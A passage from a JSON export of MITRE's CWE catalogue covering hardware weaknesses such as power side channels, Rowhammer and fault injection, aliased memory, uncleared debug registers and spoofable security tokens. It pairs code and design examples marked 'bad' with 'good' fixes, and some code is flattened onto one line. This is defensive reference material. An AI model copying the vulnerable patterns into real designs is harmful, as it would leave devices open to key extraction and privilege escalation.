partial retriesfor (i = 0; i < NUM_PW_DIGITS; i++)stored_password([i] = GetPasswordByte();endif (stored_password == saved_password)password_tries = NUM_RETRIES;break_to_Ok_to_proceedwhile (true)// Password OK","attr":{"@_Nature":"good"},"xhtml:br":["","","","","","","","","","","","","",""]}],"Body_Text":["Since the algorithm uses a different number of 1\'s and 0\'s for password validation, a different amount of power is consumed for the good byte versus the bad byte comparison. Using this information, an attacker may be able to guess the correct password for that byte-by-byte iteration with several repeated attempts by stopping the password evaluation before it completes.","Since the algorithm uses a different number of 1\'s and 0\'s for password validation, a different amount of power is consumed for the good byte versus the bad byte comparison. Using this information, an attacker may be able to guess the correct password for that byte-by-byte iteration with several repeated attempts by stopping the password evaluation before it completes.","Since comparison is done atomically, there is no indication which bytes fail forcing the attacker to brute force the whole password at once. Note that other mitigations may exist such as masking - causing a large current draw to mask individual bit flips."]},{"Intro_Text":"This code demonstrates the transfer of a secret key using Serial-In/Serial-Out shift. It\'s easy to extract the secret using simple power analysis as each shift gives data on a single bit of the key.","Example_Code":[{"#text":"module siso(clk,rst,a,q);input a;input clk,rst;output q;reg q;always@(posedge clk,posedge rst)beginif(rst==1\'b1)q<1\'b0;elseq<a;endendmodule","attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:br":["","","","","","","","","","","","","",""]},{"#text":"module pipo(clk,rst,a,q);input clk,rst;input[3:0]a;output[3:0]q;reg[3:0]q;always@(posedge clk,posedge rst)beginif (rst==1\'b1)q<4\'b0000;elseq<a;endendmodule","attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:br":["","","","","","","","","","","","","",""]}],"Body_Text":"This code demonstrates the transfer of a secret key using a Parallel-In/Parallel-Out shift. In a parallel shift, data confounded by multiple bits of the key, not just one."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2020-12788","Description":"CMAC verification vulnerable to timing and power attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12788"}},"Functional_Areas":{"Functional_Area":"Power"},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"189"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1184"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2020-05-29"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Functional_Areas, Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Accellera IP Security Assurance (IPSA) Working Group","Contribution_Organization":"Accellera Systems Initiative","Contribution_Date":"2020-09-09","Contribution_Comment":"Submitted new material that could be added to already-existing entry CWE-1255. Added new Potential Mitigations, a new example, an observed example, and an additional reference."}}},"1256":{"attr":{"@_ID":"1256","@_Name":"Improper Restriction of Software Interfaces to Hardware Features","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product provides software-controllable\\n\\t\\t\\tdevice functionality for capabilities such as power and\\n\\t\\t\\tclock management, but it does not properly limit\\n\\t\\t\\tfunctionality that can lead to modification of\\n\\t\\t\\thardware memory or register bits, or the ability to\\n\\t\\t\\tobserve physical side channels.","Extended_Description":{"xhtml:p":["It is frequently assumed that physical attacks\\n such as fault injection and side-channel analysis\\n require an attacker to have physical access to the\\n target device. This assumption may be false if the\\n device has improperly secured power management features,\\n or similar features. For mobile devices, minimizing\\n power consumption is critical, but these devices run a\\n wide variety of applications with different performance\\n requirements. Software-controllable mechanisms to\\n dynamically scale device voltage and frequency and\\n monitor power consumption are common features in today\'s\\n chipsets, but they also enable attackers to mount fault\\n injection and side-channel attacks without having\\n physical access to the device.","Fault injection attacks involve strategic\\n manipulation of bits in a device to achieve a desired\\n effect such as skipping an authentication step,\\n elevating privileges, or altering the output of a\\n cryptographic operation. Manipulation of the device\\n clock and voltage supply is a well-known technique to\\n inject faults and is cheap to implement with physical\\n device access. Poorly protected power management\\n features allow these attacks to be performed from\\n software. Other features, such as the ability to write\\n repeatedly to DRAM at a rapid rate from unprivileged\\n software, can result in bit flips in other memory\\n locations (Rowhammer, [REF-1083]).","Side channel analysis requires gathering\\n\\t\\t\\t measurement traces of physical quantities such as power\\n\\t\\t\\t consumption. Modern processors often include power\\n\\t\\t\\t metering capabilities in the hardware itself (e.g.,\\n\\t\\t\\t Intel RAPL) which if not adequately protected enable\\n\\t\\t\\t attackers to gather measurements necessary for\\n\\t\\t\\t performing side-channel attacks from software."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Memory IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Power Management IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Clock/Counter IP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"An architect may initiate introduction of\\n\\t\\t\\t\\t\\tthis weakness via exacting requirements for\\n\\t\\t\\t\\t\\tsoftware accessible power/clock management\\n\\t\\t\\t\\t\\trequirements"},{"Phase":"Implementation","Note":"An implementer may introduce this weakness\\n\\t\\t\\t\\t\\tby assuming there are no consequences to unbounded\\n\\t\\t\\t\\t\\tpower and clock management for secure components\\n\\t\\t\\t\\t\\tfrom untrusted ones."}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":["Modify Memory","Modify Application Data","Bypass Protection Mechanism"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"Perform a security evaluation of system-level\\n\\t\\tarchitecture and design with software-aided physical attacks\\n\\t\\tin scope."},{"Method":"Automated Dynamic Analysis","Description":{"xhtml:p":"Use custom software to change registers that control clock settings or power settings to try to bypass security locks, or repeatedly write DRAM to try to change adjacent locations. This can be effective in extracting or changing data. The drawback is that it cannot be run before manufacturing, and it may require specialized software."},"Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:p":"Ensure proper access control mechanisms protect software-controllable features altering physical operating conditions such as clock frequency and voltage."}}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This example considers the Rowhammer problem [REF-1083]. The Rowhammer issue was caused by a program in a tight loop writing repeatedly to a location to which the program was allowed to write but causing an adjacent memory location value to change.","Example_Code":[{"#text":"Continuously writing the same value to the same address causes the value of an adjacent location to change value.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"Redesign the RAM devices to reduce inter capacitive coupling making the Rowhammer exploit impossible.","attr":{"@_Nature":"good","@_Language":"Other"}}],"Body_Text":["Preventing the loop required to defeat the Rowhammer exploit is not always possible:","While the redesign may be possible for new devices, a redesign is not possible in existing devices. There is also the possibility that reducing capacitance with a relayout would impact the density of the device resulting in a less capable, more costly device."]},{"Intro_Text":"Suppose a hardware design implements a set of software-accessible registers for scaling clock frequency and voltage but does not control access to these registers. Attackers may cause register and memory changes and race conditions by changing the clock or voltage of the device under their control."},{"Intro_Text":"Consider the following SoC\\n\\t design. Security-critical settings for scaling clock\\n\\t frequency and voltage are available in a range of\\n\\t registers bounded by [PRIV_END_ADDR : PRIV_START_ADDR]\\n\\t in the tmcu.csr module in the HW Root of Trust. These\\n\\t values are writable based on the lock_bit register in\\n\\t the same module. The lock_bit is only writable by\\n\\t privileged software running on the tmcu.","Body_Text":{"xhtml:img":{"attr":{"@_src":"https://cwe.mitre.org/data/images/HRoT-CWE.png","@_alt":"Hardware Root of Trust"}},"xhtml:p":"We assume that untrusted software running on any of the\\n\\t Core{0-N} processors has access to the input and output\\n\\t ports of the hrot_iface. If untrusted software can clear\\n\\t the lock_bit or write the clock frequency and voltage\\n\\t registers due to inadequate protection, a fault\\n\\t injection attack could be performed."}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-11157","Description":"Plundervolt: Improper conditions check in voltage settings for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege and/or information disclosure via local access [REF-1081].","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11157"},{"Reference":"CVE-2020-8694","Description":"PLATYPUS Attack: Insufficient access control in the Linux kernel driver for some Intel processors allows information disclosure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8694"},{"Reference":"CVE-2020-8695","Description":"Observable discrepancy in the RAPL interface for some Intel processors allows information disclosure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8695"},{"Reference":"CVE-2020-12912","Description":"AMD extension to a Linux service does not require privileged access to the RAPL interface, allowing side-channel attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12912"},{"Reference":"CVE-2015-0565","Description":"NaCl in 2015 allowed the CLFLUSH instruction, making Rowhammer attacks possible.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0565"}]},"Functional_Areas":{"Functional_Area":["Power","Clock"]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"624"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1081"}},{"attr":{"@_External_Reference_ID":"REF-1082"}},{"attr":{"@_External_Reference_ID":"REF-1083"}},{"attr":{"@_External_Reference_ID":"REF-1225"}},{"attr":{"@_External_Reference_ID":"REF-1217"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-08"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Maintenance_Notes, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Functional_Areas, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"}],"Contribution":[{"attr":{"@_Type":"Content"},"Contribution_Organization":"Tortuga Logic","Contribution_Date":"2021-07-16","Contribution_Comment":"Provided Demonstrative Example for Hardware Root of Trust"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Anders Nordstrom, Alric Althoff","Contribution_Organization":"Tortuga Logic","Contribution_Date":"2021-10-11","Contribution_Comment":"Provided detection method"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Nicole Fern","Contribution_Organization":"Riscure","Contribution_Date":"2021-10-15","Contribution_Comment":"updated description and extended description, detection method, and observed examples"}]}},"1257":{"attr":{"@_ID":"1257","@_Name":"Improper Access Control Applied to Mirrored or Aliased Memory Regions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Aliased or mirrored memory regions in hardware designs may have inconsistent read/write permissions enforced by the hardware. A possible result is that an untrusted agent is blocked from accessing a memory region but is not blocked from accessing the corresponding aliased memory region.","Extended_Description":{"xhtml:p":["Hardware product designs often need to implement memory protection features that enable privileged software to define isolated memory regions and access control (read/write) policies. Isolated memory regions can be defined on different memory spaces in a design (e.g. system physical address, virtual address, memory mapped IO).","Each memory cell should be mapped and assigned a system address that the core software can use to read/write to that memory. It is possible to map the same memory cell to multiple system addresses such that read/write to any of the aliased system addresses would be decoded to the same memory cell.","This is commonly done in hardware designs for redundancy and simplifying address decoding logic. If one of the memory regions is corrupted or faulty, then that hardware can switch to using the data in the mirrored memory region. Memory aliases can also be created in the system address map if the address decoder unit ignores higher order address bits when mapping a smaller address region into the full system address.","A common security weakness that can exist in such memory mapping is that aliased memory regions could have different read/write access protections enforced by the hardware such that an untrusted agent is blocked from accessing a memory address but is not blocked from accessing the corresponding aliased memory address. Such inconsistency can then be used to bypass the access protection of the primary memory block and read or modify the protected memory.","An untrusted agent could also possibly create memory aliases in the system address map for malicious purposes if it is able to change the mapping of an address region or modify memory region sizes."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Memory IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Microcontroller IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Network on Chip IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory","Likelihood":"High"},{"Scope":"Integrity","Impact":"Modify Memory","Likelihood":"High"},{"Scope":"Availability","Impact":"DoS: Instability","Likelihood":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":["Architecture and Design","Implementation"],"Description":"The checks should be applied for consistency access rights between primary memory regions and any mirrored or aliased memory regions. If different memory protection units (MPU) are protecting the aliased regions, their protected range definitions and policies should be synchronized."},{"Phase":["Architecture and Design","Implementation"],"Description":"The controls that allow enabling memory aliases or changing the size of mapped memory regions should only be programmable by trusted software components."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["In a System-on-a-Chip (SoC) design the system fabric uses 16 bit addresses. An IP unit (Unit_A) has 4 kilobyte of internal memory which is mapped into a 16 kilobyte address range in the system fabric address map.","To protect the register controls in Unit_A unprivileged software is blocked from accessing addresses between 0x0000 \u2013 0x0FFF.","The address decoder of Unit_A masks off the higher order address bits and decodes only the lower 12 bits for computing the offset into the 4 kilobyte internal memory space."],"xhtml:table":{"xhtml:tr":[{"xhtml:td":["System Address","Mapped to"]},{"xhtml:td":["0x0000 \u2013 0x3FFF","Unit_A registers : 0x0000 \u2013 0x0FFF"]},{"xhtml:td":["0x4000 \u2013 0xFFFF","Other IPs & Memory"]}]}},"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:p":["In this design the aliased memory address ranges are these:","0x0000 \u2013 0x0FFF","0x1000 \u2013 0x1FFF","0x2000 \u2013 0x2FFF","0x3000 \u2013 0x3FFF","The same register can be accessed using four different addresses: 0x0000, 0x1000, 0x2000, 0x3000.","The system address filter only blocks access to range 0x0000 - 0x0FFF and does not block access to the aliased addresses in 0x1000 - 0x3FFF range. Thus, untrusted software can leverage the aliased memory addresses to bypass the memory protection."],"xhtml:br":""},{"attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:p":["In this design the aliased memory addresses (0x1000 - 0x3FFF) could be blocked from all system software access since they are not used by software.","Alternately, the MPU logic can be changed to apply the memory protection policies to the full address range mapped to Unit_A (0x0000 - 0x3FFF)."]}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-29"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns"}}},"1258":{"attr":{"@_ID":"1258","@_Name":"Exposure of Sensitive System Information Due to Uncleared Debug Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The hardware does not fully clear security-sensitive values, such as keys and intermediate values in cryptographic operations, when debug mode is entered.","Extended_Description":{"xhtml:p":"Security sensitive values, keys, intermediate steps of cryptographic operations, etc. are stored in temporary registers in the hardware. If these values are not cleared when debug mode is entered they may be accessed by a debugger allowing sensitive information to be accessible by untrusted parties."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"212","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory"},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":"Whenever debug mode is enabled, all registers containing sensitive assets must be cleared."}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A cryptographic core in a System-On-a-Chip (SoC) is used for cryptographic acceleration and implements several cryptographic operations (e.g., computation of AES encryption and decryption, SHA-256, HMAC, etc.). The keys for these operations or the intermediate values are stored in registers internal to the cryptographic core. These internal registers are in the Memory Mapped Input Output (MMIO) space and are blocked from access by software and other untrusted agents on the SoC. These registers are accessible through the debug and test interface.","Example_Code":[{"#text":"In the above scenario, registers that store keys and intermediate values of cryptographic operations are not cleared when system enters debug mode. An untrusted actor running a debugger may read the contents of these registers and gain access to secret keys and other sensitive cryptographic information.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"Whenever the chip enters debug mode, all registers containing security-sensitive data are be cleared rendering them unreadable.","attr":{"@_Nature":"good","@_Language":"Other"}}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"204"}},{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"545"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Related_Attack_Patterns, Relationships"},"Previous_Entry_Name":{"#text":"Sensitive Information Uncleared During Hardware Debug Flows","attr":{"@_Date":"2020-08-20"}}}},"1259":{"attr":{"@_ID":"1259","@_Name":"Improper Restriction of Security Token Assignment","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The System-On-A-Chip (SoC) implements a Security Token mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Tokens are improperly protected.","Extended_Description":"Systems-On-A-Chip (Integrated circuits and hardware engines) implement Security Tokens to differentiate and identify which actions originated from which agent. These actions may be one of the directives: \'read\', \'write\', \'program\', \'reset\', \'fetch\', \'compute\', etc. Security Tokens are assigned to every agent in the System that is capable of generating an action or receiving an action from another agent. Multiple Security Tokens may be assigned to an agent and may be unique based on the agent\'s trust level or allowed privileges. Since the Security Tokens are integral for the maintenence of security in an SoC, they need to be protected properly. A common weakness afflicting Security Tokens is improperly restricting the assignment to trusted components. Consequently, an improperly protected Security Token may be able to be programmed by a malicious agent (i.e., the Security Token is mutable) to spoof the action as if it originated from a trusted agent.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1294","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Processor IP","@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Files or Directories","Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Gain Privileges or Assume Identity","Modify Memory","Modify Memory","DoS: Crash, Exit, or Restart"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:ul":{"xhtml:li":["Security Token assignment review checks for design inconsistency and common weaknesses.","Security-Token definition and programming flow is tested in both pre-silicon and post-silicon testing."]}}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"For example, consider a system with a register for storing an AES key for encryption and decryption. The key is of 128 bits implemented as a set of four 32-bit registers. The key register assets have an associated control register, AES_KEY_ACCESS_POLICY, which provides the necessary access controls. This access-policy register defines which agents may engage in a transaction, and the type of transaction, with the AES-key registers. Each bit in this 32-bit register defines a security Token. There could be a maximum of 32 security Tokens that are allowed access to the AES-key registers. The number of the bit when set (i.e., \u201c1\u201d) allows respective action from an agent whose identity matches the number of the bit and, if \u201c0\u201d (i.e., Clear), disallows the respective action to that corresponding agent.","Body_Text":[{"#text":"Let\u2019s assume the system has two agents: a Main-controller and an Aux-controller. The respective Security Tokens are \u201c1\u201d and \u201c2\u201d.","xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Description","Default"]},{"xhtml:td":["AES_ENC_DEC_KEY_0","AES key [0:31] for encryption or decryption",0]},{"xhtml:td":["AES_ENC_DEC_KEY_1","AES key [32:63] for encryption or decryption",0]},{"xhtml:td":["AES_ENC_DEC_KEY_2","AES key [64:95] for encryption or decryption",0]},{"xhtml:td":["AES_ENC_DEC_KEY_3","AES key [96:127] for encryption or decryption",0]},{"xhtml:td":["AES_KEY_ACCESS_POLICY","AES key access register [31:0]",2]}]}},"An agent with Security Token \u201c1\u201d has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers. As per the above access policy, the AES-Key-access policy allows access to the AES-key registers if the security Token is \u201c1\u201d.","The SoC does not properly protect the Security Token of the agents, and, hence, the Aux-controller in the above example can spoof the transaction (i.e., send the transaction as if it is coming from the Main-controller to access the AES-Key registers)"],"Example_Code":[{"#text":"The Aux-controller could program its Security Token to \u201c1\u201d from \u201c2\u201d.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"The SoC needs to protect the Security Tokens. None of the agents in the SoC should have the ability to change the Security Token.","attr":{"@_Nature":"good","@_Language":"Other"}}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements. Currently it is expressed as a general absence of a protection mechanism as opposed to a specific mistake, and the entry\'s name and description could be interpreted as applying to software.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-03-06"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Improper Protection of Security Identifiers","attr":{"@_Date":"2020-08-20"}}}},"1260":{"attr":{"@_ID":"1260","@_Name":"Improper Handling of Overlap Between Protected Memory Ranges","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product allows address regions to overlap, which can result in the bypassing of intended memory protection.","Extended_Description":{"xhtml:p":["Isolated memory regions and access control (read/write) policies are used by hardware to protect privileged software. Software components are often allowed to change or remap memory region definitions in order to enable flexible and dynamically changeable memory management by system software.","If a software component running at lower privilege can program a memory address region to overlap with other memory regions used by software running at higher privilege, privilege escalation may be available to attackers. The memory protection unit (MPU) logic can incorrectly handle such an address overlap and allow the lower-privilege software to read or write into the protected memory region, resulting in privilege escalation attack. An address overlap weakness can also be used to launch a denial of service attack on the higher-privilege software memory regions."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Memory IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Such issues could be introduced during hardware architecture and design or implementation and identified later during the Testing phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Modify Memory","Read Memory","DoS: Instability"],"Likelihood":"High"}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Analysis","Description":"Create a high privilege memory block of any arbitrary size. Attempt to create a lower privilege memory block with an overlap of the high privilege memory block. If the creation attempt works, fix the hardware. Repeat the test.","Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":"Ensure that memory regions are isolated as intended and that access control (read/write) policies are used by hardware to protect privileged software."}},{"Phase":"Implementation","Description":{"xhtml:p":["For all of the programmable memory protection regions, the memory protection unit (MPU) design can define a priority scheme.","For example: if three memory regions can be programmed (Region_0, Region_1, and Region_2), the design can enforce a priority scheme, such that, if a system address is within multiple regions, then the region with the lowest ID takes priority and the access-control policy of that region will be applied. In some MPU designs, the priority scheme can also be programmed by trusted software.","Hardware logic or trusted firmware can also check for region definitions and block programming of memory regions with overlapping addresses.","The memory-access-control-check filter can also be designed to apply a policy filter to all of the overlapping ranges, i.e., if an address is within Region_0 and Region_1, then access to this address is only granted if both Region_0 and Region_1 policies allow the access."]},"Effectiveness":"High"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["For example, consider a design with a 16-bit address that has two software privilege levels: Privileged_SW and Non_privileged_SW. To isolate the system memory regions accessible by these two privilege levels, the design supports three memory regions: Region_0, Region_1, and Region_2.","Each region is defined by two 32 bit registers: its range and its access policy.","Certain bits of the access policy are defined symbolically as follows:","For any requests from software, an address-protection filter checks the address range and access policies for each of the three regions, and only allows software access if all three filters allow access.","Consider the following goals for access control as intended by the designer:","The intention is that Non_privileged_SW cannot modify memory region and policies defined by Privileged_SW in Region_0 and Region_1. Thus, it cannot read or write the memory regions that Privileged_SW is using."],"xhtml:ul":[{"xhtml:li":["Address_range[15:0]: specifies the Base address of the region","Address_range[31:16]: specifies the size of the region","Access_policy[31:0]: specifies what types of software can access a region and which actions are allowed"]},{"xhtml:li":["Access_policy.read_np: if set to one, allows reads from Non_privileged_SW","Access_policy.write_np: if set to one, allows writes from Non_privileged_SW","Access_policy.execute_np: if set to one, allows code execution by Non_privileged_SW","Access_policy.read_p: if set to one, allows reads from Privileged_SW","Access_policy.write_p: if set to one, allows writes from Privileged_SW","Access_policy.execute_p: if set to one, allows code execution by Privileged_SW"]},{"xhtml:li":["Region_0 & Region_1: registers are programmable by Privileged_SW","Region_2: registers are programmable by Non_privileged_SW"]}]},"Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:p":"Non_privileged_SW can program the Address_range register for Region_2 so that its address overlaps with the ranges defined by Region_0 or Region_1. Using this capability, it is possible for Non_privileged_SW to block any memory region from being accessed by Privileged_SW, i.e., Region_0 and Region_1."},{"#text":"Ensure that software accesses to memory regions are only permitted if all three filters permit access. Additionally, the scheme could define a memory region priority to ensure that Region_2 (the memory region defined by Non_privileged_SW) cannot overlap Region_0 or Region_1 (which are used by Privileged_SW).","attr":{"@_Nature":"good"}}],"Body_Text":"This design could be improved in several 